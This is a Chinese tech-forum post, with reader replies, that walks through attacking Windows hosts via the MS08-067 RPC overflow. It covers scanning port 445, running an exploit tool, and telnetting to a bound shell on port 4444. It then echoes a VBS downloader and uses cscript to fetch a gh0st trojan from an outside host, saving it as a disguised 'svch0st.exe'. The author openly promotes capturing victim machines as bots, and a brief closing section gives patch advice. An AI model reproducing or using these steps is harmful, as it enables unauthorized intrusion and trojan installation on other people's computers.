本站已运行

攻城狮论坛

xinmeng

作者: 芯蕊111
查看: 4628|回复: 112

主题标签Tag

more +今日重磅推荐Recommend No.1

所有IT类厂商认证考试题库下载所有IT类厂商认证考试题库下载

more +随机图赏Gallery

重量级~~30多套JAVA就业班全套 视频教程(请尽快下载,链接失效后不补)重量级~~30多套JAVA就业班全套 视频教程(请尽快下载,链接失效后不补)
【超过几百G】EVE 国内和国外镜像 全有了 百度群分享【超过几百G】EVE 国内和国外镜像 全有了 百度群分享
某linux大佬,积累多年的电子书(约300本)某linux大佬,积累多年的电子书(约300本)
乾颐堂现任明教教主Python完整版乾颐堂现任明教教主Python完整版
乾颐堂 教主技术进化论 2018-2019年 最新31-50期合集视频(各种最新技术杂谈视频)乾颐堂 教主技术进化论 2018-2019年 最新31-50期合集视频(各种最新技术杂谈视频)
Python学习视频 0起点视频 入门到项目实战篇 Python3.5.2视频教程 共847集 能学102天Python学习视频 0起点视频 入门到项目实战篇 Python3.5.2视频教程 共847集 能学102天
约21套Python视频合集 核心基础视频教程(共310G,已压缩)约21套Python视频合集 核心基础视频教程(共310G,已压缩)
最新20180811录制 IT爱好者-清风羽毛 - 网络安全IPSec VPN实验指南视频教程最新20180811录制 IT爱好者-清风羽毛 - 网络安全IPSec VPN实验指南视频教程
最新20180807录制EVE开机自启动虚拟路由器并桥接物理网卡充当思科路由器最新20180807录制EVE开机自启动虚拟路由器并桥接物理网卡充当思科路由器
最新2018/07/29录制 IT爱好者清风羽毛-Cisco IOS ZBF防火墙视频最新2018/07/29录制 IT爱好者清风羽毛-Cisco IOS ZBF防火墙视频
乾颐堂 教主技术进化论 2018年 最新1-30期合集视频(各种最新技术杂谈视频)乾颐堂 教主技术进化论 2018年 最新1-30期合集视频(各种最新技术杂谈视频)
Cisco CCW售前销售报价系统使用方法Cisco commerce workspaceCisco CCW售前销售报价系统使用方法Cisco commerce workspace

MS08-067溢出漏洞详解

  [复制链接]
查看: 4628|回复: 112
开通VIP 免金币+免回帖+批量下载+无广告
MS08-067溢出漏洞详解
9 x* ]  `. ~- V/ o2 F
7 M) B* h' x! p$ z8 ^& \7 U0 P利用远程溢出漏洞进行攻击是一种非常有效而且威力巨大的黑客攻击手段,不过远程溢出漏洞有很强的时效性,必须要抓紧时间利用这个漏洞还未被普遍补上的时机进行攻击,一旦过了这段时间,漏洞补上之后就很难再重现远程溢出攻击了。2 k) a; @8 s4 [3 N9 k7 Q6 s: ]2 [* q, I
0 P- ]& ?# D6 [: m7 U& _
    微软Windows系统已经有一年多没有爆出远程溢出漏洞了,微软爆出四年以来最严重的特大安全漏洞——MS08-067远程溢出漏洞,几乎影响所有Windows系统,并且很快成为黑客攻击和木马传播利用的手段,受此漏洞危害的用户系统将会非常之多!让我们快借此机会玩玩远程溢出吧!学过远程溢出的赶紧进行实践,抓肉鸡一抓就得!
5 h- W" d3 c5 z3 t; [8 E2 x/ O4 X  q2 d; C, F8 F! n" u
    一、MS08-067远程溢出漏洞简介
2 J5 |( N- O8 P! g+ h/ |3 A
' a% ]0 k" ~- G3 a    曾经的冲击波、震荡波等大规模攻击都是由于Windows的RPC服务漏洞造成的,MS08-067远程溢出漏洞也不例外。MS08-067远程溢出漏洞的原因是由于Windows系统中RPC存在缺陷造成的,Windows系统的Server服务在处理特制RPC请求时存在缓冲区溢出漏洞,远程攻击者可以通过发送恶意的RPC请求触发这个溢出,如果受影响的系统收到了特制伪造的RPC请求,可能允许远程执行代码,导致完全入侵用户系统,以SYSTEM权限执行任意指令并获取数据,并获取对该系统的控制权,造成系统失窃及系统崩溃等严重问题。# P) A) M* D& `$ G! ]

' f9 t3 `7 m) a6 k) \2 I9 g/ d    受MS08-067远程溢出漏洞影响的系统非常多,受影响的操作系统有Windows XP /2000/Vista/2003等。除Windows Server 2008 Core外,基本上所有的Windows系统都会遭受此漏洞的攻击,特别是在Windows 2000、Windows XP和Windows Server 2003系统,攻击者可以利用此漏洞无需通过认证运行任意代码。这个漏洞还可能被蠕虫利用,此安全漏洞可以通过恶意构造的网络包直接发起攻击,并且攻击者可以获取完整权限,因此该漏洞很可能会被用于制作蠕虫以进行大规模的攻击。% v2 r( f% T6 n
二、漏洞主机扫描& V7 M: B" N6 n# d# r
8 y. B3 G* A* C5 ?  X
    在利用MS08-067远程溢出漏洞进行攻击前,首先要找到要攻击的主机目标。由于启用了RPC服务的Windows系统往往会开放445端口,因此攻击者只要使用专业端口扫描工具扫描445端口,即可获取可溢出的主机列表。这里使用的是老牌扫描工具——图标是一个瑞士军刀的X-Scan。
6 M' t2 i" w+ A% @/ Z, h: T% M& \8 O2 s
    1.扫描设置0 M. H: _* u9 l* |5 e- v: J* y

3 R( x& f5 q  X! _; `) l    步骤1:运行X-Scan后,首先需要设置扫描的目标IP地址段。点击工具栏上的“扫描参数”按钮,选择“检测范围”选项,在“指定IP范围”里可以输入一个固定的IP地址或IP地址段。8 H2 E, ~% g6 X- K+ e

, Z6 _2 b+ l& K* W    步骤2:切换到“全局设置”→“扫描模块”选项,设置扫描模块为“开放服务”。4 }1 O+ [3 p5 g, S& V
3 f, g5 U5 Y; m* V
    步骤3:在“插件设置”→“端口相关设置”中,将待检测的端口改为“445”。0 v  B; ]9 e. n1 f* L& h2 O

1 D  d8 Y( D5 v    步骤4:在“全局设置”→“其它设置”中,将扫描类型设置为“无条件扫描”。
6 Q' L0 O: j0 E# Z' M* X6 j/ `% v& J4 V2 x6 ]/ ]% |* m# \5 o
    步骤5:最后在“全局设置”→“扫描报告”中勾选“扫描完成后自动生成并显示报告”项,设置完毕后点击确定按钮,关闭对话框。6 X4 B2 B& I) }# B- x& {
( p( a6 M% I1 n
    步骤6:点击工具栏上的“开始扫描”按钮,X-scan就开始工作了。确定后,即可开始进行扫描。扫描结束后,会自动弹出一个扫描结果窗口查看到扫描结果。如果发现开放了445端口的主机,那么这些主机只要未及时打上补丁,都很可能遭受攻击成为入侵者的肉鸡!
: ?1 R* F3 v. _+ i8 d' A三、MS08-067溢出工具溢出攻击
4 R0 n: `& d) k7 K5 X1 Z+ W$ x* @6 E4 G& k+ p5 c- |
    现在我们可以一个一个的尝试溢出攻击扫描出来的目标了。首先,下载溢出攻击工具“MS08-067远程溢出漏洞利用工具”,并将其解压于C盘根目录下。点击“开始”菜单→“运行”,输入命令“CMD”,回车后打开命令提示符窗口。进入溢出工具所有的文件夹“Release”目录下,执行命令“MS08-067.exe”,可看到溢出工具命令使用格式为: MS08-067.exe <Server>,将其中的Server换为自己要攻击的远程主机就可以了。
+ s9 i/ h' A; B/ k/ M9 ?7 ~) _9 d! a1 p2 e2 k4 l8 l0 _
    1.建立空连接9 V; E- X  n! z( `7 q; L
5 R5 N! }9 f) [1 {
    在攻击前,首先要与目标主机建立一个空连接,这里假设我们要攻击的目标主机为“192.168.1.8”,可执行如下命令:' L( z% D  z( Y/ b% h) A7 @6 |: h
4 t& F3 a8 m& r3 o: X1 z
    net use \192.168.1.9ipc$9 k" I% T7 G1 t! b; n
, j# B- i# w' K) w* [" q
    命令执行后,即可与远程主机建立一个空连接。: B" H$ t2 D( Z  H  a" A% Q
, q6 U0 Q8 D! c+ J' ?
    提示:3 E1 R- D6 b  b& `: ?! \! ~& Z9 ^
  c9 F0 ^9 T. A
    这一步不是必须的,如果有的主机无法溢出成功,可以先进行空连接。而有的主机则不必建立空连接,即可进行溢出。' m4 _! @  Z. v! S# u& I

$ g: R6 B9 w) i    2.执行远程溢出+ U* G5 G  J3 Q( W
6 M, V- k3 |5 s1 k& U: |
    建立空连接后,即可进行溢出攻击了。攻击命令如下:8 r% P* c  E% Y1 ]# w

8 Z1 K! Y% P% X. j' |9 t    MS08-067.exe 192.168.1.9
& }" W+ t: B+ z* k; R" r8 d% a8 I( [# b! h7 S
    执行攻击命令后,溢出程序就会自动与远程主机建立SMB连接,并进行溢出攻击。! [& D; _& ]7 n5 T( _4 }

/ g$ [: p+ t$ i    3.溢出返回结果& @: t4 A7 T/ S
4 e9 a+ f5 q3 ]6 R
    溢出攻击后,往往会有不同的返回结果提示信息,一般有三种情况:
1 `& t+ z  g1 `; ~: Q" c  t% O1 J
    如果返回的信息为:; j4 V4 N4 `- u6 r: t0 }

( _/ b% `# k* B, M4 _/ e! USMB Connect OK!
2 p* C/ S. Q, m5 a; m% TMaybe Patched!% U+ u9 r; Q5 [; t3 [
2 P1 N8 [. E  _1 ]7 p7 l
    那么说明远程主机上可能已经打上了该溢出漏洞补丁,虽然可以建立SMB连接,但是无法攻击成功。
' c5 L! u# H$ E" a
1 e! Y7 e& Z. W' G; Y3 E- p5 T    如果返回信息为:Make SMB Connection error:53或者Make SMB Connection error:1219,后面的数字可能是变化的。那么说明该主机没有开机连网或者没有安装 Microsoft 网络的文件和打印机共享协议 或没有启动Server服务,因此无法进行溢出。! S  P1 X8 K) N, _

+ g/ `7 c7 ?* z, A' |3 s    还有一种情况是返回信息为:. o# M, s9 ?; t( a5 V3 x
0 D' w4 p% y. G( K& o* s
SMB Connect OK!$ U, z0 H. }- ]9 b8 Z2 r
RpcExceptionCode() = 1722
' G1 |  I+ o! G$ f, `+ L7 p3 P2 P& g; o/ h9 F
    出现这样的情况,溢出失败,对方开启了防火墙。
4 {4 M/ j. d; h% Q
. {6 A0 \5 u9 O4 C, N) I  W2 T    那么最后就是成功的提示信息了:
7 J# s: K8 n& k2 ^$ Q1 H/ R- |( H& u: ~  c5 G; J
SMB Connect OK!
" ~5 l' O. z! w$ _7 DSend Payload Over!- Q1 ^) q/ v" S8 O( Y4 M3 m
- R) m+ v' g2 K+ x1 j
    出现这样的提示,说明溢出成功,成功的发送溢出模块并绑定在了远程主机端口上。" k9 V) y9 d4 J# L/ r1 s

, n$ g- Q& ?: z1 Z# D. R    4.远程登录
  [% l) Y8 E/ j' T$ p5 Q: Z
4 H# U8 s6 \0 x! {0 g    现在溢出成功后就可以远程登录了,登录命令很简单:
4 \# J* c' F# h7 j) i/ ]& k9 u
Tlenet IP地址 4444
7 k' x) {0 K( Q' P. c
* b3 O7 u6 L' C& z- {* g    直接用Telnet连接远程主机IP地址的4444端口就可以了。这里执行了命令:4 G0 Q1 L& z4 g9 M

  e% j8 a9 i/ M8 A* G/ l) rTelnet 119.1.41.97 4444
" h7 v! a1 P2 L; q* u( V0 l; Z  K7 `0 U% T! Z0 ^0 P. Z
    成功的连接上了远程主机。在远程主机上执行命令“netstat -an”时,可以看到开放了4444端口,这就是溢出打开的端口。( C& C4 O+ Y- ]* @
四、VBS脚本入侵
# H' L& v. W+ L# O' |
" \0 ]; o0 `* W$ ]3 v" o    现在我们可以在远程主机上任意添加管理员帐户,或者开启3389远程桌面进行连接。不过最简单的还是用木马来进行攻击。
' n' |3 N. H. V3 q+ c* `  _  M
" B9 \. @8 y6 _+ {# @$ O6 t    1.配置木马
; R5 d9 _9 A  i! \. Z
8 e/ e6 E- B' V9 P1 ?- |    首先,配置一个木马服务端程序,这里我选择了“gh0st 3.6”,这个木马可以过瑞星和卡巴斯基的主动防御,非常强!将木马上传到某个空间中,然后在远程主机上执行命令:“tasklist”,命令执行后可查看远程主机上的所有进程。这里我们发现远程主机未开启任何防火墙和杀毒软件,而且发现对方正在玩QQ游戏斗地主。没有运行杀毒软件的话,可以直接上传木马,连免杀都不用。如果发现杀毒软件进程的话,可以有针对性的进行免杀。
& v" q0 L6 H% g8 G3 l+ a, R* \2 ^' O5 J9 d( s! B
    2.生成下载脚本
8 w* c, B5 h5 t
6 V8 n% L. |6 ~; a3 Z    然后在远程命令窗口中执行如下命令:
. v! ?" q( u3 E+ I) w
; P$ {$ ~. i  m$ q% W6 N  Pecho iLocal  = LCase(WScript.Arguments(1)) >iget.vbe  a% e8 R) t! E7 e9 O2 q- d
echo iRemote = LCase(WScript.Arguments(0))  >>iget.vbe! C' \# y2 }) f
echo Set xPost = CreateObject("Microsoft.XMLHTTP")  >>iget.vbe
' d" g0 Y3 D. h* L/ N8 k! k/ Z6 uecho xPost.Open "GET",iRemote,0  >>iget.vbe0 S, f- k/ L; O
echo xPost.Send()  >>iget.vbe, B1 S5 I8 \5 Z$ ?
echo Set sGet = CreateObject("ADODB.Stream")  >>iget.vbe, d* X$ p3 p* k4 D' g+ B
echo sGet.Mode = 3  >>iget.vbe6 J; ~9 @9 y8 N2 K9 l1 f7 I, C4 K% J! D
echo sGet.Type = 1  >>iget.vbe
1 ]% T6 |" G% ?# jecho sGet.Open()  >>iget.vbe
* @7 m2 _/ r' C, Kecho sGet.Write(xPost.responseBody)  >>iget.vbe0 t! X, D) a2 [1 C* a1 R
echo sGet.SaveToFile iLocal,2  >>iget.vbe 2 w/ Z7 m0 `/ o% T4 q1 A: T
3 Y# h' v6 W: |! [9 G( G
    命令执行后,可在远程主机当前目录下生成一个名为“iget.vbe”的脚本文件。
7 n2 B. g6 E$ Z% m4 c+ B
+ Y9 T8 F0 u5 \8 A    在远程窗口中执行生成脚本和下载木马并运行时,速度一定要快,否则如果对方关机或者出现什么意外断开连接时,就无法再次连接了。因为这个漏洞只能溢出一次,而且溢出后只能连接一次。
) j9 o0 o7 H8 r
/ f0 X* J6 {! ^$ N! U( l3 i    3.下载运行木马1 |9 l, ?0 ~* R2 @+ d. a( H

5 s- \/ ^+ O/ M1 \    生成下载脚本后,就可以用脚本下载运行木马程序了,这里我们上传的木马连接地址为“http://xiaopuma.gicp.net:81/server.exe”,因此执行如下命令:8 d" Q6 g$ w. o. e( |

) |# i8 m& \2 h* Scscript iget.vbe http://xiaopuma.gicp.net:81/server.exe svch0st.exe
: S( A  C1 B# x, Z% S8 ]* x+ j2 T" I$ b* B$ Z* f9 A. Z. N* t
    前面的“cscript”是用于执行脚本的,后面的“svch0st.exe”是下载木马后保存的文件名。命令执行后,木马就被下载到远程主机上了。在命令行窗口中执行“svch0st.exe”,即可成功运行木马程序。" K; R+ T& I5 D+ v4 N3 Z

/ j2 `1 q: W4 e: N3 m2 n7 T    用木马客户端连接木马,一台肉鸡就到手啦!笔者在测试过程中,发现MS08-067远程溢出成功率可达30%以上。一般来说,只要远程主机上未安装防火墙,并且同时开启了Computer Browser、Server、Workstation这三个系统服务,并且存在此溢出漏洞,通常都可以溢出成功。+ V' Y  d- O8 p2 ^. E' v) P

0 P* {9 b( }1 }: b) h' a: b5 q( W    五、防范MS08-067远程溢出' j$ M/ B6 p  q% i; Q! T3 @

. D: i% C: _) m4 s  J% o    由于MS08-067远程溢出危害非常大,因此有必要对其进行防范。但是由于前段时间的微软“黑屏”事件让不少用户成了关闭了自动更新,宁可系统漏洞百出也不去打补丁,于是此漏洞在许多主机上都存在,给黑客利用MS08-067漏洞进行攻击提供了可乘之机。其实造成盗版用户黑屏的补丁是KB892130,这个漏洞的安全补丁编号是KB958644,我们只要安装此补丁就可以了,也可以通过第三方工具,下载补丁包打上该补丁。
5 s! M' A0 r/ l4 e4 ^: N- I! p3 q" I7 A
    另外,将Computer Browser、Server、Workstation这三个系统服务关闭,毕竟这三个服务在大多数情况下是用不到的。同时,为了防止以后RPC又出现什么漏洞,最好是安装防火墙,关闭本机的445端口。
' I0 `2 k$ r5 N# ]
CCNA考试 官方正规报名 仅需1500元
回复 论坛版权

使用道具 举报

1174315 [特邀嘉宾] 发表于 2013-8-30 19:02:09 | 显示全部楼层
一下子发这么多,我继续路过
& Q% d) i' J/ K/ I
回复 支持 反对

使用道具 举报

cool-co [Lv8 技术精悍] 发表于 2013-10-17 20:28:47 | 显示全部楼层
有道理。。。感谢攻城狮论坛
回复 支持 反对

使用道具 举报

十字路口 [Lv8 技术精悍] 发表于 2013-10-18 13:31:07 | 显示全部楼层
这是什么东东啊
回复 支持 反对

使用道具 举报

yoyoyoyoyoyo [Lv8 技术精悍] 发表于 2013-10-18 19:25:40 | 显示全部楼层
路过,学习下,感谢攻城狮论坛
回复 支持 反对

使用道具 举报

751218 [Lv8 技术精悍] 发表于 2013-10-21 15:29:51 | 显示全部楼层
回复 支持 反对

使用道具 举报

lwhr2 [Lv8 技术精悍] 发表于 2013-10-21 15:31:40 | 显示全部楼层
有竞争才有进步嘛
回复 支持 反对

使用道具 举报

润土 [Lv8 技术精悍] 发表于 2013-10-21 15:44:36 | 显示全部楼层
我抢、我抢、我抢沙发~
回复 支持 反对

使用道具 举报

yinrui [Lv8 技术精悍] 发表于 2013-12-7 16:45:39 | 显示全部楼层
写的真的很不错
回复 支持 反对

使用道具 举报

时光后 [Lv8 技术精悍] 发表于 2013-12-7 16:46:49 | 显示全部楼层
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|无图浏览|手机版|网站地图|攻城狮论坛

GMT+8, 2020-6-5 14:22 , Processed in 0.272792 second(s), 19 queries , Gzip On, Memcache On.

Powered by Discuz! X3.2 © 2001-2013 Comsenz Inc.

Designed by ARTERY.cn